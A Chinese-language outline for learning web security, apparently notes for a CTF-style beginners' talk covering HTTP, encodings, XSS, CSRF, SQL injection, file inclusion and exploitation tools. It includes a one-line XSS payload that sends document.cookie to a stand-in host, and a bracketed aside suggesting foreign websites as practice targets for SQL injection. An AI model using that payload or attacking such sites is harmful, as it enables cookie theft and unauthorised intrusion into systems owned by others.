写在前面的

1. 学习使用Linux系统 [先在虚拟机里]
2. github + hexo 来记录自己的学习历程 [超级好弄]
3. 正则表达式
4. 推荐案盲打 + VIM
5. 浏览器FF + chrome

正文

1. 关于web

   我们不需要像web开发那样关注布局,美感

   1. 前端

      • html
      • css
        写在style标签里，共有三种嵌入html的方式
        作用:决定布局和样式
      • javascript
        写在script标签里
      • 直接用F12

   2. 后台

      • php
      • python [+]
      • node
      • java

2. 关于HTTP [浏览器输入网址后发生了什么]

   1. 给大家抓个包[burpsuite] => 并很自然的提到FF和chrome的插件
   2. 顺便安利markdown以及chrome的markdown插件
   3. post请求，get请求

3. 常见的加密 && 编码

   1. base64 [特点: 等号]
   2. rot13 [还有其他各种rot]
   3. 常见的hash => md5 /sha1

4. 熟悉常见的套路

5. 关于常见的漏洞 [没有时间就不展开讲了]

   1. 前端
      1. xss
         • 反射型，存储型
         • 推荐网站
           • http://prompt.ml/
           • https://alf.nu/alert1
         • 窃取cookie
           • new Image().src = “http://eval.com“ + document.cookie;
           • 发起请求
      2. csrf
         • 删除文章的例子
   2. 服务器端
      1. PHP
         主要研究PHP漏洞，有些是相通的
         学过C的话很容易看懂
         此处提醒$_GET['a'], $_POST['a']….
         其他的就是喜闻乐见的循环啊,函数啊，之类的
      2. 数据库[SQLi] [注意法律，自己搭建靶机，或者拿国外网站做靶机] 数据
         • 错误注入
         • 盲注
      3. 上传漏洞 [上传shell]
         • 一般是图片上传
      4. 文件包含 [RFI, LFI]
         • 读源码 => php伪协议, 套路[xxx.php.swp]

6. 漏洞利用

   1. 语言不重要，首选python => 简单啊，省时间，库多，不需要造轮子
   2. 推荐 python黑帽子[很薄，很快可读完]
   3. 漏洞利用框架
      • msf, 后渗透框架
      • …
   4. 各种神奇的工具

7. 其他发展方向 [主要是逆向工程]

   1. binary [我一点都不会]
   2. 推荐看雪加密解密, 漏洞战争, 有趣的二进制[mini]

8. 学一学数学 [与本文不相关]